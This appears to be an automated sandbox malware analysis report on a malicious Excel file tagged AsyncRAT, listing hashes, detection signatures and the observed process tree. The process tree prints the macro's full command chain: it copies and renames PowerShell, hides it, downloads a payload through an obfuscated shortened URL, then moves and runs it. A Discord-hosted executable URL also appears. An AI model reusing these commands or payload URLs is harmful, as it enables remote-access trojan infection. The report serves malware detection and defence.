Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1099008FEDEX_090887766.xls

Overview

General Information

Sample Name:1099008FEDEX_090887766.xls
Analysis ID:320331
MD5:069451376c805d4b4d21fdc34a5e58ba
SHA1:5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256:dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
Tags:AsyncRATRATxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 AsyncRAT
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected AsyncRAT
Binary contains a suspicious time stamp
Connects to a URL shortener service
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Found Excel 4.0 Macro with suspicious formulas
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 7120 cmdline: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Robocopy.exe (PID: 5776 cmdline: robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z MD5: BB8F54AE10FDA174289A4A495809EB69)
    • cmd.exe (PID: 7140 cmdline: cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5568 cmdline: timeout /t 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • cmd.exe (PID: 7156 cmdline: cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4880 cmdline: cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • o.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 1708 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • o.exe (PID: 5728 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 6260 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • o.exe (PID: 1560 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • vc.exe (PID: 4896 cmdline: C:\Users\user\AppData\Roaming\vc.exe MD5: BB7C0DFD8ECC7EEBCE937A232608695F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1099008FEDEX_090887766.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x10bc2:$s1: Excel
  • 0x32b0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    Process Memory Space: vc.exe PID: 4896JoeSecurity_AsyncRATYara detected AsyncRATJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6844, ProcessCommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, ProcessId: 7120

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 1099008FEDEX_090887766.xlsReversingLabs: Detection: 14%
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,14_2_0125C197
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\powershell.exeJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
      Source: global trafficDNS query: name: tinyurl.com
      Source: global trafficTCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443
      Source: global trafficTCP traffic: 192.168.2.3:49733 -> 104.20.138.65:443

      Networking:

      barindex
      Connects to a URL shortener serviceShow sources
      Source: unknownDNS query: name: tinyurl.com
      Source: unknownDNS query: name: tinyurl.com
      Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
      Source: Joe Sandbox ViewIP Address: 104.20.138.65 104.20.138.65
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: unknownDNS traffic detected: queries for: tinyurl.com
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: vc.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: vc.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
      Source: o.exe, 00000011.00000003.407523508.0000000007AEE000.00000004.00000001.sdmp, vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0r
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0
      Source: o.exe, 00000011.00000002.413694833.00000000008C5000.00000004.00000020.sdmp, vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: vc.exe.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: vc.exe.14.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: vc.exe.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: vc.exe.14.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca4.com0
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: vc.exe.14.drString found in binary or memory: http://ocsp.digicert.com0H
      Source: vc.exe.14.drString found in binary or memory: http://ocsp.digicert.com0I
      Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.drString found in binary or memory: http://ocsp.digicert.com0O
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngd
      Source: o.exe, 0000000E.00000002.394765913.00000000050D1000.00000004.00000001.sdmp, o.exe, 00000010.00000002.396533915.0000000005451000.00000004.00000001.sdmp, o.exe, 00000011.00000002.421442532.00000000046D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: http://tinyurl.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmld
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: vc.exe.14.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: o.exe, 00000011.00000003.405026738.0000000008D3B000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co.
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.office.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.onedrive.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://augloop.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://autodiscover-s.outlook.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/770629131393
      Source: o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/770629131393$
      Source: o.exe, 0000000E.00000002.396972338.0000000005536000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/7706291313930
      Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/770629131393171507/778732067705454592/ees.exe
      Source: o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cdn.entity.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cortana.ai
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://cr.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://directory.services.
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pesterd
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://graph.windows.net
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://graph.windows.net/
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
